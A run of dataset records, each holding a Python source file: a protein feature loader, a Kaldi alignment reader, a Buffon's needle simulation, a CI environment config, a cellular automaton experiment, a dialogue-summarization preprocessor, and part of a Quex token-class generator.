self.singleChainfeatsToInclude.\n Otherwise, selectedCols= [ colNum ], where colNum is the column number\n of the column whose name matches useNameColum\n @param lookForPairFeats: bool. Whether to load pairwise features or single chain features otherwise \n @return (fnamesIterator, selectedCols)\n fnamesIterator: Iterator str. Fnames that contains feature featName for ligand or receptor id\n prefixOneChainType\n selectedCols: int[]. Columns that will to be selected \n '''\n## print(self.singleChainfeatsToInclude, featNum)\n if lookForPairFeats:\n featName, (relativePathToFeats, selectedCols, nameColDict) = self.pairfeatsToInclude[featNum]\n else:\n featName, (relativePathToFeats, selectedCols, nameColDict) = self.singleChainfeatsToInclude[featNum]\n if not useNameColum is None: selectedCols= [nameColDict[useNameColum]]\n featuresPath= os.path.join(self.dataRootPath, relativePathToFeats)\n return featName, (self.getFullNamesIterInPath(prefixOneChainType, featuresPath), selectedCols)\n \n def loadDataFile(self, fnamesIterator, selectedCols=None):\n '''\n Returns the pandas.DataFrame resulted from all fnames files concatenation\n contained at fnamesIterator\n @param fname: str. Iterator of file names containing features to be loaded. \n @param selectedCols: int[]. List of colums to be selected. If None\n all colums will be selected\n @return df: pandas.DataFrame. A pandas.Dataframe in which each row represents the feature of \n a residue that is contained in one of the file names of fnamesIterator\n Column names are specified in the header of files\n\n '''\n resultDF_list= []\n factorColumns={}\n fnamesList= list(fnamesIterator)\n for fname in fnamesList:\n try:\n df= pd.read_table(fname,sep='\\s+', header='infer', comment=\"#\", \n dtype= {elem:str for elem in DataLoader.ARE_STR_TYPE_COLUMNS})\n if DataLoader.IGNORE_X_AA:\n if \"resName\" in df:\n df= df[df[\"resName\"]!=\"X\"]\n if \"resNameL\" in df:\n df= df[(df[\"resNameL\"]!=\"X\") & (df[\"resNameR\"]!=\"X\")]\n except pd.io.common.CParserError:\n print(\"Error reading %s\"%fname)\n raise\n df_toCheck= df if not \"categ\" in df else df.drop(\"categ\",axis=1)\n## print(df_toCheck.head())\n if df_toCheck.isnull().values.any()==True:\n raise ValueError(\"There are missing values or nans in %s\"%fname)\n with open(fname) as f:\n firstLine= f.readline()\n if firstLine.startswith(\"#Levels\"):\n factorColumns= self._parseLevels(firstLine, df.columns)\n for colName in factorColumns:\n df[colName]= pd.Categorical(df[colName], categories=factorColumns[colName], ordered=False) \n #Select desired columns \n if not selectedCols is None:\n ids_cols=[]\n for i,colum in enumerate(df.columns):\n if colum in DataLoader.ARE_STR_TYPE_COLUMNS:\n ids_cols.append(i)\n assert len(set(ids_cols).intersection(set(selectedCols))) ==0, (\"problems loading file %s. Ids_cols and \"+\n \"selectedCols overlap\")%fname \n df= df.ix[:, ids_cols+ selectedCols]\n for colName in DataLoader.ALWAYS_SKIP_COLUMNS:\n if colName in df:\n del df[colName]\n\n df= pd.get_dummies(df, prefix_sep='_dummy_', columns= list(factorColumns.keys()))\n resultDF_list.append( df )\n df= pd.concat(resultDF_list)\n assert df.shape[0]> 1, \"Error loading files %s there are no rows\"%str(fnamesList)\n return df\n \n def _parseLevels(self, firstLine, colNames):\n '''\n Helper method for self.loadDataFile. Itparses first line of a file\n looking for factor variables levels\n @param firstLine: str. The first line of a file\n @param colNames: str[]. The column names of the pandas.DataFrame\n @return colNumDict: { colName:[level0, level1 ...]}\n ''' \n colNumDict= [ factorDes.split(\":\") for factorDes in firstLine.split()[1:] ]\n colNumDict= { colNames[int(factorDes[0])]:factorDes[1].split(\";\") for factorDes in colNumDict }\n return colNumDict\n \n def getFullNamesIterInPath(self, prefix, dirname):\n '''\n returns a full filename that startswith given prefix an belongs to \n directory dirname\n @param prefix: str. the prefixes with which file names must start to be considered\n @param dirname: str. The directory where files will be looked for\n @yields fullName. The full name of a file that startswith prefix and is in dirname\n '''\n fullName= None\n for fname in os.listdir(dirname):\n if fname.startswith(prefix):\n fullName= os.path.join(dirname, fname)\n yield fullName\n\n","sub_path":"codifyComplexes/codifyProtocols/DataLoaderClass.py","file_name":"DataLoaderClass.py","file_ext":"py","file_size_in_byte":8207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"556579313","text":"'''@file alignment_reader.py\ncontains the AlignmentReader class'''\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport tfreader\n\nclass AlignmentReader(tfreader.TfReader):\n '''reader for kaldi alignments'''\n\n def _read_metadata(self, datadirs):\n '''read the mean and std for normalization and the input dimension\n\n Args:\n datadir: the directory where the metadata was written\n\n Returns:\n the metadata as a dictionary\n '''\n\n metadata = dict()\n\n #read the maximum lengths\n max_lengths = []\n for datadir in datadirs:\n with open(os.path.join(datadir, 'max_length')) as fid:\n max_lengths.append(int(fid.read()))\n metadata['max_length'] = max(max_lengths)\n\n #read the sequence length histograms\n metadata['sequence_length_histogram'] = np.zeros(\n [metadata['max_length'] + 1])\n for datadir in datadirs:\n with open(os.path.join(datadir,\n 'sequence_length_histogram.npy')) as fid:\n histogram = np.load(fid)\n metadata['sequence_length_histogram'][:histogram.shape[0]] += (\n histogram\n )\n\n return metadata\n\n def _create_features(self):\n '''\n creates the information about the features\n\n Returns:\n A dict mapping feature keys to FixedLenFeature, VarLenFeature,\n and SparseFeature values\n '''\n\n return {'data': tf.FixedLenFeature([], dtype=tf.string)}\n\n def _process_features(self, features):\n '''process the read features\n\n features:\n A dict mapping feature keys to Tensor and SparseTensor values\n\n Returns:\n a pair of tensor and sequence length\n '''\n\n data = tf.decode_raw(features['data'], tf.int32)\n sequence_length = tf.shape(data)[0]\n\n return data, sequence_length\n","sub_path":"nabu/processing/tfreaders/alignment_reader.py","file_name":"alignment_reader.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203547481","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\nclass Line:\n def __init__(self, line_distance):\n self.D = line_distance\n self.line_under = 1.0\n\nclass Needle:\n def __init__(self, length, n_step):\n self.L = length\n line = Line(10)\n self.middle = line.line_under + line.D * np.random.rand(n_step)\n self.theta = np.pi * np.random.rand(n_step)\n\nclass Simulation:\n def __init__(self, n_step):\n self.n_step = n_step\n\n needle = Needle(5, self.n_step)\n self.L = needle.L\n self.middle = needle.middle\n self.theta = needle.theta\n\n line = Line(10)\n self.D = line.D\n self.line_under = line.line_under\n\n def plot_needle(self):\n\n fig = plt.figure(figsize=(6, 6))\n imgs = []\n\n for i in range(self.n_step):\n x = [self.L/2*np.cos(self.theta[i]+np.pi), self.L/2*np.cos(self.theta[i])]\n y = [self.middle[i]+self.L/2*np.sin(self.theta[i]+np.pi), self.middle[i]+self.L/2*np.sin(self.theta[i])]\n img1 = plt.plot(x,y)\n\n imgs.append(img1)\n\n anim = animation.ArtistAnimation(fig, imgs, interval=100, repeat=False)\n\n plt.xlim(-10,10)\n plt.ylim(-7.5,17.5)\n\n p = np.arange(-10,10,0.01)\n q = np.full(p.shape[0], -6.0)\n r = np.full(p.shape[0], 6.0)\n p = np.arange(-10, 10, 0.01)\n q = np.full(p.shape[0], self.line_under)\n r = np.full(p.shape[0], self.line_under+self.D)\n plt.plot(p, q, linestyle=\"-\", linewidth=0.5, color='black')\n plt.plot(p, r, linestyle=\"-\", linewidth=0.5, color='black')\n\n anim.save('needle_only.gif', 'imagemagick')\n\n plt.show()\n\n def calculation(self):\n\n judge = []\n\n for i in range(self.n_step):\n down = self.middle[i] + self.L/2 * np.sin(self.theta[i]+np.pi)\n up = self.middle[i] + self.L/2 * np.sin(self.theta[i])\n if (up < self.D + self.line_under) & (down > self.line_under):\n judge.append(0)\n else:\n judge.append(1)\n\n probability = judge.count(1) / len(judge)\n\n calculated_pi = 2 * self.L / self.D / probability\n\n relative_error = abs(np.pi-calculated_pi) / np.pi\n\n print('calculated pi is {}'.format(calculated_pi))\n print('n_step: {} , relative_error: {}'.format(self.n_step, relative_error))\n\nif __name__ == '__main__':\n\n simulation = Simulation(200)\n simulation.plot_needle()\n simulation.calculation()\n\n\n\n\n\n\n\n","sub_path":"Buffon's needle problem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"451109056","text":"import os\n\nGCP_PROJECT = os.environ['HAIL_GCP_PROJECT']\nassert GCP_PROJECT != ''\nGCP_ZONE = os.environ['HAIL_GCP_ZONE']\nassert GCP_ZONE != ''\nGCP_REGION = '-'.join(GCP_ZONE.split('-')[:-1]) # us-west1-a -> us-west1\nDOCKER_PREFIX = os.environ.get('HAIL_DOCKER_PREFIX', f'gcr.io/{GCP_REGION}')\nassert DOCKER_PREFIX != ''\nDOCKER_ROOT_IMAGE = os.environ['HAIL_DOCKER_ROOT_IMAGE']\nassert DOCKER_ROOT_IMAGE != ''\nDOMAIN = os.environ['HAIL_DOMAIN']\nassert DOMAIN != ''\nIP = os.environ.get('HAIL_IP')\nCI_UTILS_IMAGE = os.environ.get('HAIL_CI_UTILS_IMAGE', f'{DOCKER_PREFIX}/ci-utils:latest')\nBUILDKIT_IMAGE = os.environ['HAIL_BUILDKIT_IMAGE']\nDEFAULT_NAMESPACE = os.environ['HAIL_DEFAULT_NAMESPACE']\nKUBERNETES_SERVER_URL = os.environ['KUBERNETES_SERVER_URL']\nBUCKET = os.environ['HAIL_CI_BUCKET_NAME']\n","sub_path":"ci/ci/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"202119344","text":"import numpy as np\nimport os.path\nimport json\nimport concurrent.futures as cf\nimport signal\nfrom itertools import product\nimport matplotlib.pyplot as plt\nfrom collections import Counter \n\n# Import data\n\n\n\n\nTIME_BOUND = 500\n\nclass MyTimeoutError(Exception):\n def __init__(self, value = \"Timed Out\"):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\ndef timeout(seconds_before_timeout):\n def decorate(f):\n def handler(signum, frame):\n raise MyTimeoutError()\n def new_f(*args, **kwargs):\n old = signal.signal(signal.SIGALRM, handler)\n signal.alarm(seconds_before_timeout)\n try:\n result = f(*args, **kwargs)\n finally:\n # reinstall the old signal handler\n signal.signal(signal.SIGALRM, old)\n # cancel the alarm\n # this line should be inside the \"finally\" block (per Sam Kortchmar)\n signal.alarm(0)\n return result\n new_f.func_name = f.__name__\n return new_f\n return decorate\n\n\n\ndef F(state, f_dic):\n n = len(state)\n new_state = \"\"\n for i in range(1, len(state)-1):\n new_state += f_dic[state[(i-1)%n] + state[i%n] + state[(i+1)%n]]\n return new_state\n\ndef f(rule):\n wolfram = np.binary_repr(rule, 8)\n f_dic = {}\n for i in range(8):\n f_dic[np.binary_repr(i, 3)] = wolfram[7-i]\n return f_dic\n\ndef generate_random_initial_condition(grid_size):\n return \"\".join(str(a) for a in np.random.choice([0, 1], size=(grid_size,), p=[1./3, 2./3]))\n\ndef save_rule_cache(rule, limit=16):\n print(f\"generating rule {rule} cache...\")\n rule_cache = {}\n f_dict = f(rule)\n for i in range(limit, 2, -1):\n for u in range(2**i):\n key = np.binary_repr(u, i)\n rule_cache[key] = ''.join(str(e) for e in F(key, f_dict))\n path = os.path.expanduser(f\"~/rule_caches/rule_cache_{rule}.json\")\n json.dump(rule_cache, open(path, 'w'), indent=2)\n return rule_cache\n \ndef read_cache(rule):\n path = os.path.expanduser(f\"~/rule_caches/rule_cache_{rule}.json\")\n if os.path.isfile(path) and os.access(path, os.R_OK):\n with open(path, \"r\") as file:\n cache = json.load(file)\n else:\n cache = save_rule_cache(rule)\n return cache\n\n@timeout(TIME_BOUND)\ndef simulate(rule_cache, init, divident=14):\n history = {}\n state = init\n l = len(state)\n q = l//divident\n r = l%divident\n t = 0\n while True:\n try:\n previous_time = history[state]\n return previous_time, t\n except:\n history[state] = t\n new_state = \"\"\n for i in range(0, q):\n new_state +=rule_cache[ state[divident*i-1] + state[divident*i:divident*i+divident] + state[(divident*i+divident)%l]]\n if r:\n new_state += rule_cache[state[divident*q-1] + state[divident*q: l] + state[0]]\n state = new_state\n t += 1\n\n\ndef read_results(path):\n if os.path.isfile(path) and os.access(path, os.R_OK):\n with open(path, \"r\") as file:\n results = json.load(file)\n else:\n json.dump({}, open(path, \"w\"))\n results = {}\n return results\n\n\n\ndef transients(rule, inits):\n for init in inits:\n grid_size = len(init)\n# print(f\"starting to compute, rule={rule}, grid_size={grid_size}, init={init}\")\n path = os.path.expanduser(f\"~/ECA_results2/rule{rule}_{grid_size}.json\")\n rule_cache = read_cache(rule)\n res = read_results(path)\n \n t, _ = simulate(rule_cache, init)\n res[init] = t\n json.dump(res, open(path, \"w\"))\n \n values = list(res.values())\n hist = {}\n for ele in values: \n if str(ele) in hist: \n hist[str(ele)] += 1\n else : \n hist[str(ele)] = 1\n\n x = [int(i) for i in hist.keys()]\n y = [hist[i] for i in hist.keys()]\n\n\n plt.bar(x, y, color=\"darkred\")\n plt.title(f'True Distribution for n={len(inits[0])}')\n plt.ylabel(\"frequency\")\n# plt.yticks(np.arange(min(values), max(values)+1, 1.0))\n plt.xlabel(\"transient length\")\n plt.show()\n \n\n\n# Plot\n# kwargs = dict(hist_kws={'alpha':.6}, kde_kws={'linewidth':2})\n# \n# plt.figure(figsize=(10,7), dpi= 80)\n# sns.distplot(values, color=\"dodgerblue\", label=\"Compact\", **kwargs)\n# # plt.xlim(50,75)\n# plt.show()\n\n\n\ninits = [\"\".join(str(i) for i in v) for v in product([0, 1], repeat=16)]\nprint(inits)\npath = os.path.expanduser(\"~/ECA_results2/rule110.json\")\nres = json.load(open(path, \"r\"))\n# trans = [int(res[i]) for i in res.keys()]\ntrans = res[\"16\"][\"transients\"]\nprint(len(trans))\nprint(np.mean(trans))\n \nhist = {}\nfor ele in trans: \n if str(ele) in hist: \n hist[str(ele)] += 1\n else : \n hist[str(ele)] = 1\n \nx = [int(i) for i in hist.keys()]\ny = [hist[i]/len(trans) for i in hist.keys()]\n \n \n \nplt.bar(x, y, color=\"darkred\")\nplt.title(f'Sampled Distribution for n={len(inits[0])}')\nplt.ylabel(\"frequency\")\n# plt.yticks(np.arange(min(values), max(values)+1, 1.0))\nplt.xlabel(\"transient length\")\nplt.show()\n\n# transients(110, inits)\n \n \n \n \n \n \n \n","sub_path":"DDLab/antoch.py","file_name":"antoch.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"298654976","text":"import os\nimport numpy as np\nimport pandas as pd\nimport json\n\ndef load_corpus(corpus_dir, data_name='train'):\n\n assert data_name in ['train', 'val', 'test']\n\n df = pd.read_table(os.path.join(corpus_dir, data_name+\".tsv\"), index_col=0)\n df = df.dropna(subset=['dialogue'])\n\n source_list = list(df['dialogue'].values)\n target_list = list(df['summary'].values)\n print(\"{:<5} source :\".format(data_name),len(source_list),\", target:\",len(target_list))\n\n return source_list, target_list\n\n\n return train_source_list, train_target_list, val_source_list, val_target_list, test_source_list, test_target_list\n\ndef check_no_newline(text_list):\n for text in text_list:\n assert \"\\r\" in text or \"\\n\" in text\n\ndef save_data(text_list, output_dir, data_name, mode):\n with open(os.path.join(output_dir, '{}.{}'.format(data_name, mode)), 'w') as f:\n f.write('\\n'.join(text_list))\n\ndef newline_to_sep(text_list):\n \"\"\"\n 改行を[SEP]に変換\n \"\"\"\n return [text.replace(\"\\r\\n\",\" [SEP] \").replace(\"\\n\",\" [SEP] \").replace(\"\\r\",\" [SEP] \") for text in text_list]\n\ndef dialogue_preprocess(text_list):\n \"\"\"\n [SAYS]: ':' after Speaker Names,\n [EOU] : End of Utterance(Sentence),\n [EOT] : End of a Speaker's Talk,\n\n Example:\n John [SAYS] Hi, Daive! [EOU] How are you? [EOU] [EOT] Daive [SAYS] I'm good, thanks. ([EOU] [EOT])\n \"\"\"\n\n # Delete ':' after Speaker Names and Add [SAYS] Tokens\n pp_text_list = []\n flag_full_name = False\n for text in text_list:\n word_list = []\n for word_i, w in enumerate(text.split(\" \")):\n if flag_full_name and w.endswith(':'):\n word_list.append(w[:-1])\n word_list.append(\"[SAYS]\")\n flag_full_name = False\n continue\n if \"\\r\\n\" in w or \"\\n\" in w or \"\\r\" in w or word_i==0:\n if w.endswith(':'):\n word_list.append(w[:-1])\n word_list.append(\"[SAYS]\")\n else:\n word_list.append(w)\n flag_full_name = True\n else:\n word_list.append(w)\n pp_text_list.append(\" \".join(word_list))\n \n assert len(text_list) == len(pp_text_list)\n\n # Delete Newlines\n pp_text_list = [text.replace(\"\\r\\n\",\" \").replace(\"\\n\",\" \").replace(\"\\r\",\" \") for text in pp_text_list]\n\n # Add [EOU] or [EOT] before Speaker Name\n pp2_text_list = []\n for sentence_i, text in enumerate(pp_text_list):\n w_prev = \"[NULL]\"\n speaker_prev = \"[NULL]\"\n word_list = text.split(\" \")\n acc = 0\n for word_i, w in enumerate(text.split(\" \")):\n if w == \"[SAYS]\":\n if speaker_prev != \"[NULL]\" and speaker_prev == w_prev:\n word_list[word_i-acc] = \"[EOU]\"\n word_list.pop(word_i-1-acc)\n acc += 1\n elif speaker_prev != \"[NULL]\" and speaker_prev != w_prev:\n if word_list[word_i - 2 - acc] and word_list[word_i - 2 - acc][-1].isalpha():\n word_list[word_i - 2 - acc] = word_list[word_i - 2 - acc] + \".\"\n word_list.insert(word_i - 1 - acc, \"[EOT]\")\n acc -= 1\n \n speaker_prev = w_prev\n w_prev = w\n pp2_text_list.append(\" \".join(word_list))\n \n assert len(text_list) == len(pp2_text_list)\n\n # Add [EOU] Tokens at End of Utterance(Sentence)\n pp2_text_list = [\n text.replace(\". \",\". [EOU] \")\n .replace(\"! \",\"! [EOU] \")\n .replace(\"? \",\"? [EOU] \") for text in pp2_text_list\n ]\n \n # Replace Consecutive Spaces for a Space\n pp2_text_list = [\n text.replace(\" \",\" \")\n .replace(\" \",\" \") for text in pp2_text_list\n ]\n \n # Add '.'(Period) and [EOU] Tokens at End of Utterance(Sentence)\n pp3_text_list = []\n for sent_i, text in enumerate(pp2_text_list):\n w_prev = \"[NULL]\"\n w_prev_prev = \"[NULL]\"\n word_list = text.split(\" \")\n acc = 0\n for word_i, w in enumerate(text.split(\" \")):\n if w == \"[EOT]\" and w_prev == \"[EOU]\" and w_prev_prev[-1].isalpha():\n word_list[word_i-2+acc] = word_list[word_i-2+acc]+\".\"\n elif w == \"[EOT]\" and w_prev[-1].isalpha():\n word_list[word_i-1+acc] = word_list[word_i-1+acc]+\".\"\n word_list.insert(word_i+acc,\"[EOU]\")\n acc += 1\n elif w == \"[EOT]\" and w_prev != \"[EOU]\":\n word_list.insert(word_i+acc,\"[EOU]\")\n acc += 1\n w_prev_prev = w_prev\n w_prev = w\n pp3_text_list.append(' '.join(word_list))\n \n assert len(text_list) == len(pp3_text_list)\n\n # Replace Consecutive [EOU] Tokens for a [EOU] Token\n pp4_text_list = []\n for sent_i, text in enumerate(pp3_text_list):\n w_prev = \"[NULL]\"\n word_list = text.split(\" \")\n acc = 0\n for word_i, w in enumerate(text.split(\" \")):\n if w == \"[EOU]\" and w_prev == \"[EOU]\":\n word_list.pop(word_i+acc)\n acc -= 1\n w_prev = w\n pp4_text_list.append(' '.join(word_list))\n\n assert len(text_list) == len(pp4_text_list)\n\n # Check No Consecutive [EOU] Tokens\n for text in pp4_text_list:\n w_prev = \"[NULL]\"\n for w in text.split(\" \"):\n assert w == \"[EOU]\" and w_prev == \"[EOU]\"\n w_prev = w\n\n # Fix a Bit\n pp4_text_list = [text.replace(\":D.\", \":D\") for text in pp4_text_list]\n\n # Add [EOU] and [EOT] Tokens at the End of Dialogues.\n pp4_text_list = [text+\" [EOU] [EOT]\" for text in pp4_text_list]\n\n return pp4_text_list\n\ndef preprocess(corpus_dir, output_dir, dialogue=False):\n train_source_list, train_target_list = load_corpus(corpus_dir, data_name='train')\n val_source_list, val_target_list = load_corpus(corpus_dir, data_name='val')\n test_source_list, test_target_list = load_corpus(corpus_dir, data_name='test')\n\n data_list = [\n train_source_list, train_target_list,\n val_source_list, val_target_list,\n test_source_list, test_target_list,\n ]\n \n pp_data_list = []\n for text_list in data_list:\n if dialogue:\n pp_data_list.append(dialogue_preprocess(text_list))\n else:\n pp_data_list.append(newline_to_sep(text_list))\n\n for text_list in pp_data_list:\n check_no_newline(text_list)\n \n data_names = ['train', 'val', 'test']\n for i, text_list in enumerate(pp_data_list):\n data_name = data_names[int(i/2)]\n mode = 'source' if i%2==0 else 'target'\n save_data(text_list, output_dir, data_name, mode)\n","sub_path":"notebooks/.ipynb_checkpoints/preprocess-checkpoint.py","file_name":"preprocess-checkpoint.py","file_ext":"py","file_size_in_byte":6729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"379467616","text":"\"\"\"\nObjects dealing with any sort of spatial and temporal filtering of output.\n\nSpatial\n-------\n- `_find_indices` -- Find indices for a given lat/lon point on a meshgrid.\n- `extract_region` -- Directly extracts a subset of a dataset.\n\"\"\"\n\nimport numpy as np\n\ndef _find_indices(xgrid, ygrid, xpoint, ypoint):\n \"\"\"\n Returns the i,j index for a latitude/longitude point on a grid.\n \n Parameters\n ----------\n xgrid, ygrid : array_like, shape (`M`, `N`).\n Longitude and latitude meshgrid. \n xpoint, ypoint : int or 1-D array_like\n Longitude and latitude of point searching for on grid. \n Should be in the same range as the grid itself (e.g.,\n if the longitude grid is 0-360, should be 200 instead\n of -160)\n\n Returns\n ------\n i, j : int\n Keys for the inputted grid that lead to the lat/lon point\n the user is seeking.\n\n Examples\n --------\n >>> import esmtools as et\n >>> import numpy as np\n >>> x = np.linspace(0, 360, 37)\n >>> y = np.linspace(-90, 90, 19)\n >>> xx, yy = np.meshgrid(x, y)\n >>> xp = 20\n >>> yp = -20\n >>> i, j = et.filtering.find_indices(xx, yy, xp, yp)\n >>> print(xx[i, j])\n 20.0\n >>> print(yy[i, j])\n -20.0\n\n \"\"\"\n dx = xgrid - xpoint\n dy = ygrid - ypoint\n reduced_grid = abs(dx) + abs(dy)\n min_ix = np.nanargmin(reduced_grid)\n i, j = np.unravel_index(min_ix, reduced_grid.shape)\n return i, j\n\ndef extract_region(ds, xgrid, ygrid, coords, lat_dim='nlat', lon_dim='nlon'):\n \"\"\"\n Takes in an array of data, its lon/lat grid, and coordinates pertaining\n to the lat/lon sub-box desired and returns the extracted data. \n\n Parameters\n ----------\n ds : array_like\n Data to extract sub-region from. Ideally dataset.\n xgrid, ygrid : array_like\n Longitude and latitude meshgrid.\n coords : vector\n [x0, x1, y0, y1] pertaining to corners of box to extract\n lat_dim, lon_dim : str (optional)\n \n\n Return\n ------\n subset_data : array_like\n Data subset to domain of interest\n \"\"\"\n print(\"NOTE: Make sure your coordinates are in order [x0, x1, y0, y1]\")\n x0, x1, y0, y1 = coords\n a, c = _find_indices(lon, lat, x0, y0)\n b, d = _find_indices(lon, lat, x1, y1)\n subset_data = ds.isel(nlat=slice(a, b), nlon=slice(c, d))\n return subset_data\n\n","sub_path":"esmtools/filtering.py","file_name":"filtering.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469264782","text":"# (C) 2005-2017 Frank-Rene Schaefer\n# ABSOLUTELY NO WARANTY\nfrom quex.input.files.token_type import TokenTypeDescriptor\nfrom quex.engine.misc.string_handling import blue_print\nimport quex.token_db as token_db\nfrom quex.blackboard import setup as Setup, Lng\n\nfrom collections import OrderedDict\n\ndef do():\n \"\"\"RETURNS: [0] Header content for token id definition, or None.\n [1] Global declaration of the 'lexeme null', or \"\"\n [2] Header text of the token class definition.\n [3] Implementation of the token class.\n \"\"\"\n assert not Setup.converter_only_f\n\n assert token_db.token_type_definition is not None\n\n\n if token_db.token_type_definition.manually_written():\n # User has specified a manually written token class\n # (LexemeNull must be declared in global header)\n header_txt = \"\"\n implementation_txt = \"\"\n else:\n # (LexemeNull is declared in token class header)\n header_txt, \\\n implementation_txt = _do(token_db.token_type_definition)\n\n return header_txt, \\\n implementation_txt\n\ndef _do(Descr):\n txt, txt_i = _do_core(token_db.token_type_definition)\n\n if Setup.language.upper() == \"C++\":\n # C++: declaration and (inline) implementation in header.\n header_txt = \"\\n\".join([txt, txt_i])\n implementation_txt = \"\"\n else:\n # C: declaration in header, implementation in source file.\n header_txt = txt\n implementation_txt = txt_i \n\n # The 'lexeme null' definition *must be* in the implementation file!\n # Except that the token class comes from outside\n if not Setup.extern_token_class_file:\n if not implementation_txt:\n implementation_txt = \"%s\\n\" % Lng.INCLUDE(Setup.output_token_class_file)\n\n implementation_txt += extra_lib_implementations_txt\n\n return header_txt, implementation_txt\n\ndef _do_core(Descr):\n # The following things must be ensured before the function is called\n assert Descr is not None\n assert isinstance(Descr, TokenTypeDescriptor)\n\n virtual_destructor_str, \\\n copy_str, \\\n take_text_str = _some_standard_stuff(Descr)\n\n # In case of plain 'C' the class name must incorporate the namespace (list)\n if Setup.language == \"C\":\n token_class_name = Setup.token_class_name_safe\n else:\n token_class_name = Descr.class_name\n\n # ------------\n # TODO: Following should be always placed in front of footer/header:\n # ------------\n if Setup.token_class_only_f: \n helper_definitions = helper_definitions_common\n elif Setup.output_configuration_file: \n helper_definitions = Lng.INCLUDE(Setup.output_configuration_file)\n else:\n helper_definitions = \"\"\n\n if not Setup.implement_lib_quex_f:\n quex_lib_dir = \"lib/quex\"\n else:\n quex_lib_dir = \"%s/lib/quex\" % Setup.output_directory\n\n helper_variable_replacements = [\n [\"$$HELPER_DEFINITIONS$$\", helper_definitions],\n [\"$$OUTPUT_DIR$$\", Setup.output_directory],\n [\"$$QUEX_LIB_DIR$$\", quex_lib_dir],\n [\"$$NAMESPACE_OPEN$$\", Lng.NAMESPACE_OPEN(Descr.name_space)],\n [\"$$NAMESPACE_CLOSE$$\", Lng.NAMESPACE_CLOSE(Descr.name_space)],\n [\"$$TOKEN_CLASS$$\", token_class_name],\n ]\n\n template_str = Lng.open_template(Lng.token_template_file())\n txt = blue_print(template_str, [\n [\"$$BODY$$\", Lng.SOURCE_REFERENCED(Descr.body)],\n [\"$$CONSTRUCTOR$$\", Lng.SOURCE_REFERENCED(Descr.constructor)],\n [\"$$COPY$$\", copy_str],\n [\"$$DESTRUCTOR$$\", Lng.SOURCE_REFERENCED(Descr.destructor)],\n [\"$$DISTINCT_MEMBERS$$\", get_distinct_members(Descr)],\n [\"$$FOOTER$$\", Lng.SOURCE_REFERENCED(Descr.footer)],\n [\"$$FUNC_TAKE_TEXT$$\", take_text_str],\n [\"$$HEADER$$\", Lng.SOURCE_REFERENCED(Descr.header)],\n [\"$$QUICK_SETTERS$$\", get_quick_setters(Descr)],\n [\"$$SETTERS_GETTERS$$\", get_setter_getter(Descr)],\n [\"$$TOKEN_REPETITION_N_GET$$\", Lng.SOURCE_REFERENCED(Descr.repetition_get)],\n [\"$$TOKEN_REPETITION_N_SET$$\", Lng.SOURCE_REFERENCED(Descr.repetition_set)],\n [\"$$UNION_MEMBERS$$\", get_union_members(Descr)],\n [\"$$VIRTUAL_DESTRUCTOR$$\", virtual_destructor_str],\n ])\n\n template_i_str = Lng.open_template(Lng.token_template_i_file())\n txt_i = blue_print(template_i_str, [\n [\"$$INCLUDE_TOKEN_CLASS_HEADER$$\", Lng.INCLUDE(Setup.output_token_class_file)],\n [\"$$CONSTRUCTOR$$\", Lng.SOURCE_REFERENCED(Descr.constructor)],\n [\"$$COPY$$\", copy_str],\n [\"$$DESTRUCTOR$$\", Lng.SOURCE_REFERENCED(Descr.destructor)],\n [\"$$FOOTER$$\", Lng.SOURCE_REFERENCED(Descr.footer)],\n [\"$$FUNC_TAKE_TEXT$$\", take_text_str],\n [\"$$TOKEN_CLASS_HEADER$$\", token_db.token_type_definition.get_file_name()],\n [\"$$TOKEN_REPETITION_N_GET$$\", Lng.SOURCE_REFERENCED(Descr.repetition_get)],\n [\"$$TOKEN_REPETITION_N_SET$$\", Lng.SOURCE_REFERENCED(Descr.repetition_set)],\n ])\n\n txt = blue_print(txt, helper_variable_replacements)\n txt_i = blue_print(txt_i, helper_variable_replacements)\n\n if Setup.token_class_only_f:\n # All type definitions need to be replaced!\n replacements = Lng.type_replacements(DirectF=True)\n txt = blue_print(txt, replacements, \"QUEX_TYPE_\")\n txt_i = blue_print(txt_i, replacements, \"QUEX_TYPE_\")\n\n return txt, txt_i\n\nextra_lib_implementations_txt = \"\"\"\n$$INC: lexeme/basics.i$$\n$$INC: lexeme/converter-from-lexeme.i$$\n$$INC: quex/MemoryManager.i$$\n$$INC: quex/bom.i$$\n\n$$--------------------------------------------\nQUEX_TYPE_LEXATOM QUEX_GNAME(LexemeNull) = (QUEX_TYPE_LEXATOM)0;\n$$-----------------------------------------------------------------------------\n\"\"\"\n\n#______________________________________________________________________________\n# [MEMBER PACKAGING]\n#\n# The 'distinct_db' and 'union_db' dictionaries are not to be sorted for\n# iteration! The members need to be written in the sequence which is provided \n# by '.items()'.\n# => The ordered dictionary lists them in the sequence as when they were \n# defined. \n# => User is able to define 'packaging'.\n#______________________________________________________________________________\n\ndef get_distinct_members(Descr):\n TL = Descr.type_name_length_max()\n NL = Descr.variable_name_length_max()\n\n return \"\".join(\n __member(type_code, TL, name, NL)\n for name, type_code in Descr.distinct_db.items() # No sort! [MEMBER PACKAGING]\n )\n\ndef get_union_members(Descr):\n TL = Descr.type_name_length_max()\n NL = Descr.variable_name_length_max()\n if not Descr.union_db: return \"\"\n \n txt = [\" union {\\n\"]\n for name, type_descr in Descr.union_db.items(): # No sort! [MEMBER PACKAGING]\n if isinstance(type_descr, OrderedDict):\n txt.append(\" struct {\\n\")\n txt.extend(\n __member(sub_type, TL, sub_name, NL, IndentationOffset=\" \" * 8)\n for 